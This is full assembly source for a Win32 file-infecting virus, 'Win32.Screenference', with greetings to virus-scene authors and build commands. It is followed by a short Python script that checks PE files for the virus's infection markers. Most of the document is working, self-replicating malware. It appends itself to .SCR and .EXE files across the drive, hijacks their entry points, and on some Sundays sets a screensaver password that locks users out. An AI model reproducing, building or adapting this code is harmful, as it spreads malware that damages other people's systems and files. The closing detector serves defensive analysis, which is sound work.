;----------------------------------------------------------------------------
;                   Win32.Screenference by Malfunction
;----------------------------------------------------------------------------
; Hi out there! This is my first little Win32 infector. There's nothing
; special about it, no new technique, no new way of infecting. Yes, it is
; a very poorly coded direct action infector. :(
; But: have you ever heard of McAfee's silly feature 'scanning while
; the screensaver runs'?
; This virus is the answer to that feature. An infected EXE file
; will infect only SCR filez in the %windir% and %windir%\system directoriez.
; An infected SCR file will create a new thread for infecting and then
; immediately return to the host. The created thread infectz the whole
; HD usin' a dir traversal. I know it's slow and makes the user
; suspicious, but it's funny: a virus that infectz during the screensaver...
;----------------------------------------------------------------------------
; Thanx 'n' greetz:
;----------------------------------------------------------------------------
;
; Wang_E: I'm sure that u'll have yer own OS one day.
;         Thx for all da help, my friend!
; Blackart: Yeah, I'm still codin' that trojan...
; Evil_byte: Have you listened to "Mirror, Mirror" by Blind Guardian yet? ;)
; Benny/29A: All yer tutes in 29A#4 rox!
; Lord Julus: VX-Tasy #1 is one of the best ezines I have ever seen.
;
;
; Compile with: tasm32.exe /m9 /ml screenf.asm
;               tlink32.exe /aa /Tpe /c /x screenf.obj,, import32.lib
;               pewrite.exe screenf.exe
;
; (PEWrite is part of Lord Julus' VX-Tasy #1)
.386
.MODEL FLAT
EXTRN Messageboxa: Proc
EXTRN EXITPROCESS: PROC
EXTRN GETPROCADDRESS: PROC
EXTRN GETMODULEHANDLEA: PROC
.DATA
Dummy_title DB "Senseless Dummy PROG V1.01", 0
Dummy_msg DB "Dummy Prog Carrying a Little Win32 Infector ...", 0
.code
Dummy:
Push 0; Just A Dummy ...
Push offset dummy_title
Push offset dummy_msg
PUSH 0
Call Messageboxa
PUSH 0
Call EXITPROCESS
v_size = v_end - v_start
v_start:; Gimme That Delta
Call delta
Delta:
POP EBP
JMP over_var; Variables Part I
FILEHANDLE DD?
Maphandle DD?
MapAddr DD?
MapSize DD?
KEYHANDLE DD?
Value1 DD 1
HMODULE DD?
Oldeip DD?
FileAlign DD?
K32Name DB "kernel32", 0
Advapiname DB "Advapi32", 0
Procsfound DB 0
Searchmask DB "*.scr", 0
Wildcard DB "*.*", 0
Root DB '\', 0
Nested DB 0
Dotdot DB "..", 0
FNHANDLE DD?
Fnhandle2 DD?
THREADID DD?
_alloc dd?
PTRGETPROCADDRESS DD?
PTRGETMODULEHANDLEA DD?
FILETYPE DB 'E'
_GetProcAddress DB "GetProcAddress", 0
_GetModuleHandleA DB "GetModuleHandleA", 0
APIs:
GetWindowsDirectorya DD?
GetCurrentDirectorya DD?
SETCURRENTDIRECTORYA DD?
GetSystemDirectorya DD?
GetCommandlinea DD?
GetSystemTime DD?
EXITTHREAD DD?
CREATTHREAD DD?
CloseHandle DD?
UnmapViewoffile dd?
MapViewOffile DD?
SETFILEATTRIBUTESA DD?
CREATEFILEMAPPINGA DD?
CREATEFILEA DD?
FINDNEXTFILEA DD?
FindFirstFilea DD?
VirtualAlloc DD?
LoadLibrarya DD?
RegSetValueExa DD?
Over_var:
DB 0B8H; MOV Eax, IMM32; Save Old EIP
Oldeip2 DD Offset Dummy
MOV [EBP OLDEIP-DELTA], EAX
DB 0B8H; MOV Eax, IMM32; Trace to Import Table
BaseAddress DD 00400000H
Add Eax, [EAX 3CH]
Add Eax, 80h
Mov Eax, [EAX]
Add Eax, [EBP BaseAddress-Delta]
IMPORT1:
CMP DWORD PTR [EAX], 0; Last Import Descriptor?
JZ Quit
Mov ESI, [EAX 0CH]
Add ESI, [EBP BaseAddress-Delta]
Lea EDI, [EBP K32NAME-DELTA]; Is IT KERNEL32?
Push 2
POP ECX
Rep CMPSD
JZ Import2
Add Eax, 14h
JMP import1
IMPORT2:
MOV EBX, [EAX]; Search for the needed API
MOV EDX, [EAX+10H]; addresses ...
Add EBX, [EBP BaseAddress-Delta]
Add Edx, [EBP BaseAddress-Delta]
IMPORT3:
CMP DWORD PTR [EBX], 0
JZ NO_MORE_IMP
Mov ESI, [EBX]
Add ESI, [EBP BaseAddress-Delta]
Inc ESI
Inc ESI
PUSH ESI
Lea EDI, [EBP _GETPROCADDRESS-DELTA]; Is IT GetProcAddress?
Push 14
POP ECX
REP CMPSB
JNZ NO_STORE1
Mov Edi, [EDX]
MOV [EBP PTRGETPROCADDRESS-DELTA], EDI
Inc Byte PTR [EBP Procsfound-Delta]
NO_STORE1:
Lea EDI, [EBP _GETMODULEHANDLEA-DELTA]; Is IT getModuleHandlea?
Push 4
POP ECX
POP ESI
Rep CMPSD
JNZ NO_STORE2
Mov Edi, [EDX]
MOV [EBP PTRGETMODULEHANDLEA-DELTA], EDI
Inc Byte PTR [EBP Procsfound-Delta]
NO_STORE2:
Add ebx, 4
Add EDX, 4
JMP IMPORT3
NO_MORE_IMP:
CMP BYTE PTR [EBP Procsfound-Delta], 2; Both Apiaddresses Found?
Jnz quit
MOV BYTE PTR [EBP Procsfound-Delta], 0
Lea Eax, [EBP K32NAME-DELTA]; GIMME K32 BASE
Push EAX
Call [EBP PTRGETMODULEHANDLEA-DELTA]
MOV [EBP HMODULE-DELTA], EAX
PUSH 18
POP ECX
Lea EDI, [EBP APIS-DELTA]
Lea ESI, [EBP PTR_TABLE-DELTA]
GET_APIS:; Retrieve All Needed APIZ
Lodsd
Add Eax, EBP
Sub Eax, Offset Delta
Push ECX
Push EDI
PUSH ESI
Push EAX
Push DWORD PTR [EBP HMODULE-DELTA]
Call [EBP PTRGETPROCADDRESS-DELTA]
POP ESI
POP EDI
POP ECX
Test Eax, EAX
JZ Quit
Stosd
Loop get_apis
Push 40h; Allocate 1000 Bytes
Push 1000h
Push 1000
PUSH 0
Call [EBP+VirtualAlloc-Delta]
Test Eax, EAX
JZ Quit
MOV [EBP _ALLOC-DELTA], EAX
Add Eax, 580; Get System Time
Push EAX
Push EAX
Call [EBP GetSystemTime-Delta]
POP EAX
CMP Word PTR [EAX 4], 0; Sunday?
JNZ NO_PAYLOAD
CMP Word PTR [EAX+6], 7; 1st Sunday of month?
JA NO_PAYLOAD
Lea Eax, [EBP Advapiname-Delta]; load advapi32.dll
Push EAX
Call [EBP LOADLIBRARYA-DELTA]
Test Eax, EAX
JZ NO_PAYLOAD
Push Eax; Get RegopenkeyExa Address
LEA EBX, [EBP _REGOPENKEYEXA-DELTA]
Push EBX
Push EAX
Call [EBP PTRGETPROCADDRESS-DELTA]
Lea EBX, [EBP Keyhandle-Delta]; Open the REG KEY
Push EBX
Push 001f0000h
PUSH 0
Lea EBX, [EBP RegKey-Delta]
Push EBX
PUSH 80000001H
Call EAX
POP Eax; Get RegSetValueexa Address
Lea EBX, [EBP _REGSETVALUEEXA-DELTA]
Push EBX
Push EAX
Call [EBP PTRGETPROCADDRESS-DELTA]
MOV [EBP RegSetValueexa-Delta], EAX
Push 25; Set Screensaver PWD
Lea EBX, [EBP VALUE2-DELTA]
Push EBX
Push 3
PUSH 0
Lea EBX, [EBP VALUE2NAME-DELTA]
Push EBX
Push DWORD PTR [EBP KeyHandle-Delta]
Call EAX
Push 4; Enable Screensaver PWD
Lea Eax, [EBP VALUE1-DELTA]
Push EAX
Push 4
PUSH 0
Lea Eax, [EBP VALUE1NAME-DELTA]
Push EAX
Push DWORD PTR [EBP KeyHandle-Delta]
Call [EBP RegSetValueexa-Delta]
NO_PAYLOAD:
MOV EAX, [EBP _Alloc-Delta]; Get Current Dir
Add Eax, 320
Push EAX
Push 260
Call [EBP GETCURRENTDIRECTORYA-DELTA]
CMP BYTE PTR [EBP FILETYPE-DELTA], 'E'; IS An EXE OR A SCR EXECUTED?
JNZ Screen_save
ITS_EXE:
MOV DWORD PTR [EBP+Searchmask+1-Delta], 'RCS.'; set for findfile
MOV BYTE PTR [EBP FILETYPE-DELTA], 'S'
MOV EAX, [EBP _Alloc-Delta]; Infect Windoze Dir
Push EAX
Push 320
Push EAX
Call [EBP GETWINDOWSDIRECTORYA-DELTA]
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Call infect_dir
MOV EAX, [EBP _Alloc-Delta]; Infect Windoze / System Dir
Push EAX
Push 320
Push EAX
Call [EBP+GetSystemDirectoryA-Delta]
Call [EBP+SETCURRENTDIRECTORYA-DELTA]
Call infect_dir
MOV EAX, [EBP _Alloc-Delta]; Go to Old Dir
Add Eax, 320
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Quit:
JMP [EBP OLDEIP-DELTA]; JMP to Host
Screen_save:
MOV DWORD PTR [EBP+Searchmask+1-Delta], 'EXE.'; set for findfile
MOV BYTE PTR [EBP FILETYPE-DELTA], 'E'
Call [EBP getcommandlinea-delta]; Get CommandLine
Mov Edi, EAX
XOR EAX, EAX
Get_end:
Scasb
JNZ get_end
CMP BYTE PTR [EDI-2], 'S'; was the parameter /s?
JZ Run_It; (we don't want to infect
CMP BYTE PTR [EDI-2], 's'; when the SCR is being configured)
JZ Run_It
JMP quit
Run_it:
MOV [EBP SAVE_EBP-DELTA], EBP; Save Ebp for New Thread
Lea Eax, [EBP Threadid-Delta]; Create The Infection Thread
Push EAX
PUSH 0
PUSH 0
Lea Eax, [EBP Mythread-Delta]
Push EAX
PUSH 0
PUSH 0
Call [EBP CREATTHREAD-DELTA]
JMP quit; return to host
Mythread:
DB 0BDH; MOV EBP, IMM32; Get Delta Handle
Save_ebp dd?
Lea Eax, [EBP ROOT-DELTA]; SET ROOT DIR AS CURRENT DIR
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Call dirtrav; infect!
PUSH 0
Call [EBP EXITTHREAD-DELTA]; EXIT THREAD
Dirtrav:
Call Infect_Dir; Infect Directory
Push DWORD PTR [EBP _Alloc-Delta]; Find Dir
Lea Eax, [EBP WILDCARD-DELTA]
Push EAX
Call [EBP FINDFIRSTFILEA-DELTA]
Push EAX
INC EAX
JZ Check_Root
Dec EAX
MOV [EBP FNHANDLE-DELTA], EAX
JMP Test_iF_Dir
FINDNEXTDIR:
Push DWORD PTR [EBP _Alloc-Delta]; Find Next Dir
Push DWORD PTR [EBP FNHANDLE-DELTA]
Call [EBP FINDNEXTFILEA-DELTA]
Test Eax, EAX
JZ Check_Root
TEST_IF_DIR:
Mov Eax, [EBP _ALLOC-DELTA]
Test DWORD PTR [EAX], 10H; is it a directory?
JZ Findnextdir
Mov Eax, [EBP _ALLOC-DELTA]
Add Eax, 44
CMP BYTE PTR [EAX], '.'; is it '.' or '..'?
JZ FINDNEXTDIR
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]; Go to Found Dir
Inc Byte PTR [EBP NESTED-DELTA]
Call Dirtrav; Recursive!
MOV EAX, [ESP]
MOV [EBP FNHANDLE-DELTA], EAX
JMP FindNextdir
Check_root:
CMP BYTE PTR [EBP NESTED-DELTA], 0; Are We at root?
JZ end_trav
Lea EAX, [EBP DOTDOT-DELTA]; Go to '..'
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Dec Byte PTR [EBP NESTED-DELTA]
End_trav:
Add ESP, 4
RET
INFECT_DIR:
Push DWORD PTR [EBP _Alloc-Delta]; Find A File
Lea EAX, [EBP Searchmask-Delta]
Push EAX
Call [EBP FINDFIRSTFILEA-DELTA]
INC EAX
JZ NO_MORE_FILEZ
Dec EAX
MOV [EBP FNHANDLE2-DELTA], EAX
JMP infect_file
FINDNEXTFILE:
Push DWORD PTR [EBP _ALLOC-DELTA]; Find Next File
Push DWORD PTR [EBP FNHANDLE2-DELTA]
Call [EBP FINDNEXTFILEA-DELTA]
Test Eax, EAX
JZ NO_MORE_FILEZ
Infect_file:
XOR EDX, EDX
Mov Eax, [EBP _ALLOC-DELTA]
Mov Eax, [EAX 32]
MOV ECX, 201
Div ECX
Test EDX, EDX
JZ FINDNEXTFILE; ALREADY INFECTED?
MOV EAX, [EBP _Alloc-Delta]; (fsize modulo 201 = 0)
Mov Eax, [EAX 32]
Add Eax, v_size; align fsize to 201 ...
Push EAX
XOR EDX, EDX
Div ECX
POP EAX
SUB EDX, 201
NEG EDX
Add Eax, EDX
MOV [EBP MAPSIZE-DELTA], EAX; ... And Save IT
Push 80h; Clear File Attributes
Mov Eax, [EBP _ALLOC-DELTA]
Add Eax, 44
Push EAX
Call [EBP SETFILEATTRIBUTESA-DELTA]
Test Eax, EAX
JZ FindNextFile
PUSH 0; OPEN file
Push 80h
Push 3
PUSH 0
PUSH 0
Push 0C0000000H
Mov Eax, [EBP _ALLOC-DELTA]
Add Eax, 44
Push EAX
Call [EBP CREATEFILEA-DELTA]
INC EAX
JZ FindNextFile
Dec EAX
MOV [EBP FileHandle-Delta], EAX
Push 0; Map File Part I
Push DWORD PTR [EBP MAPSIZE-DELTA]
PUSH 0
Push 4
PUSH 0
Push EAX
Call [EBP CREATEFILEMAPPINGA-DELTA]
Test Eax, EAX
JZ Closefile
MOV [EBP MAPHANDLE-DELTA], EAX
Push DWORD PTR [EBP MAPSIZE-DELTA]; MAP File Part II
PUSH 0
PUSH 0
Push 2
Push EAX
Call [EBP MAPVIEWOFFILE-DELTA]
Test Eax, EAX
JZ Closefile
MOV [EBP MAPADDR-DELTA], EAX
CMP Word PTR [EAX], 'ZM'; EXE SIGNATURE?
JNZ Unmap
Add Eax, [EAX 3CH]
MOV EDX, [EBP MAPADDR-DELTA]
CMP EAX, EDX
JNAE Unmap
Mov EDI, [EBP _Alloc-Delta]
Add Edx, [EDI 32]
CMP EAX, EDX
Ja unmap
CMP DWORD PTR [EAX], 00004550H; PE SIGNATURE?
JNZ Unmap
Mov Edx, [EAX 28H]; Save Entrypoint
MOV [EBP OLDEIP2-DELTA], EDX
Mov Edx, [EAX 34H]
MOV [EBP BaseAddress-Delta], EDX; Save Base Address
Add [EBP OLDEIP2-DELTA], EDX
MOV EDX, [EAX 3CH]; Save file alignment
MOV [EBP FileAlign-Delta], EDX
Mov ESI, [EAX 74H]; Go to the last section header
SHL ESI, 3
Movzx EBX, Word PTR [EAX 6]
Dec EBX
XCHG EAX, EBX
Imul Eax, Eax, 28h
Lea ESI, [ESI EAX 78H]
Add ESI, EBX
OR DWORD PTR [ESI 24H], 0E0000020H; Set Characteristix
Add DWORD PTR [ESI 8], V_SIZE; CORRECT VIRTUALSIZE
MOV Eax, [ESI 8]
XOR EDX, EDX; Calculate New Rawsize
MOV ECX, [EBP FileAlign-Delta]
Div ECX
Test EDX, EDX
JZ NO_INC
INC EAX
NO_INC:
Mul ECX
Mov Edx, EAX
Sub EDX, [ESI 10h]
Add [EBX 50H], EDX; Add Increase to Image Size
MOV [ESI 10h], EAX; Save New Rawsize
PUSH ESI
Mov Edi, [ESI 8]; Prepare to Copy Virus
Add Edi, [ESI 14H]
SUB EDI, V_SIZE
Add EDI, [EBP+MAPADDR-DELTA]
MOV ECX, V_SIZE; copy it!
Lea ESI, [EBP V_START-DELTA]
REP MOVSB
POP ESI; Save New Entrypoint
Mov EDI, [ESI 8]
Add Edi, [ESI 0CH]
SUB EDI, V_SIZE
MOV [EBX 28H], EDI
Unmap:
Push DWORD PTR [EBP MAPADDR-DELTA]; Unmap file
Call [EBP UnmapViewOffile-Delta]
Closefile:
Push DWORD PTR [EBP FileHandle-Delta]; And Close IT
Call [EBP CloseHandle-Delta]
MOV EAX, [EBP _Alloc-Delta]; restore Old Attribs
Push EAX
Add Eax, 44
Push EAX
Call [EBP SETFILEATTRIBUTESA-DELTA]
JMP FindNextFile
NO_MORE_FILEZ:
RET
; Variables Part II
Apinames:
_GetWindowsDirectoryA DB "GetWindowsDirectoryA", 0
_GetCurrentDirectoryA DB "GetCurrentDirectoryA", 0
_SetCurrentDirectoryA DB "SetCurrentDirectoryA", 0
_GetSystemDirectoryA DB "GetSystemDirectoryA", 0
_GetCommandLineA DB "GetCommandLineA", 0
_GetSystemTime DB "GetSystemTime", 0
_ExitThread DB "ExitThread", 0
_CreateThread DB "CreateThread", 0
_CloseHandle DB "CloseHandle", 0
_UnmapViewOfFile DB "UnmapViewOfFile", 0
_MapViewOfFile DB "MapViewOfFile", 0
_SetFileAttributesA DB "SetFileAttributesA", 0
_CreateFileMappingA DB "CreateFileMappingA", 0
_CreateFileA DB "CreateFileA", 0
_FindNextFileA DB "FindNextFileA", 0
_FindFirstFileA DB "FindFirstFileA", 0
_VirtualAlloc DB "VirtualAlloc", 0
_LoadLibraryA DB "LoadLibraryA", 0
_RegSetValueExA DB "RegSetValueExA", 0
_RegOpenKeyExA DB "RegOpenKeyExA", 0
PTR_TABLE:
DD Offset _GetWindowsDirectorya
DD Offset _GetcurrentDirectorya
DD offset _SetCurrentDirectoryA
DD Offset _getsystemDirectorya
DD offset _GetCommandLineA
DD offset _GetSystemTime
DD Offset _exitthread
DD Offset _CreateTHRead
DD offset _closehandle
DD Offset _unmapViewoffile
DD Offset _MapViewoffile
DD offset _SetFileAttributesA
DD offset _createfilemappinga
DD offset _createfilea
DD offset _findnextfilea
DD offset _findfirstfilea
DD offset _virtualalloc
DD Offset _LoadLibrarya
RegKey DB "Control Panel\Desktop", 0
Value1Name DB "ScreenSaveUsePassword", 0
Value2 DB 31H, 42H, 41H, 44H, 32H, 34H, 35H, 38H, 32H, 32H, 32H, 37H, 45H
DB 37H, 35H, 45H, 33H, 39H, 44H, 38H, 30H, 38H, 41H, 41H, 00h
Value2Name DB "ScreenSave_Data", 0
v_end:
END V_START
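A defender-side check added here (my own code, not part of the listing above or of any AV product) that looks for the three traces this infector's infect_file routine leaves in a PE: a file size that is a multiple of 201 (the marker the code tests before infecting), a last section header OR'ed with 0E0000020h, and an entry point moved into that last section. The two sample PE images are constructed inline for testing and contain headers only; function names are mine.

```python
import struct

INFECTION_MODULO = 201            # infect_file skips files whose size is already a multiple of 201
VIRUS_SECTION_FLAGS = 0xE0000020  # characteristics OR'ed into the last section header

def check_screenf_markers(data: bytes) -> dict:
    """Report the three traces this infector leaves in a PE image held in memory."""
    result = {"size_mod_201_zero": len(data) % INFECTION_MODULO == 0,
              "last_section_rwx": False, "entry_in_last_section": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if pe + 0x78 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return result
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 0x14)[0]
    entry = struct.unpack_from("<I", data, pe + 0x28)[0]
    # last section header: walk past the real optional header size (the virus assumes 0E0h)
    last = pe + 0x18 + opt_size + (nsections - 1) * 0x28
    if nsections == 0 or last + 0x28 > len(data):
        return result
    vsize, vaddr = struct.unpack_from("<II", data, last + 8)
    flags = struct.unpack_from("<I", data, last + 0x24)[0]
    result["last_section_rwx"] = (flags & VIRUS_SECTION_FLAGS) == VIRUS_SECTION_FLAGS
    result["entry_in_last_section"] = vaddr <= entry < vaddr + vsize
    return result

def looks_infected(data: bytes) -> bool:
    """All three markers together are the signature; any one alone is common in clean files."""
    return all(check_screenf_markers(data).values())

def build_sample_pe(entry: int, last_flags: int, pad_to_201: bool) -> bytes:
    """Constructed two-section PE32 skeleton (headers only, no code) used as test input."""
    pe = 0x40
    dos = bytearray(b"MZ" + b"\0" * (pe - 2))
    struct.pack_into("<I", dos, 0x3C, pe)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry)   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x5C, 16)      # NumberOfRvaAndSizes
    def section(name, vaddr, flags):
        return struct.pack("<8sIIIIIIHHI", name, 0x1000, vaddr, 0x200, 0x400, 0, 0, 0, 0, flags)
    data = bytes(dos) + coff + bytes(opt) + section(b".text", 0x1000, 0x60000020) + section(b".data", 0x2000, last_flags)
    if pad_to_201:
        data += b"\0" * (-len(data) % INFECTION_MODULO)
    return data
```

On a real sample, verify the hit by also checking that the entry point lies in the last 0x1000 bytes or so of the section, since a legitimate packer can produce a writable last code section too.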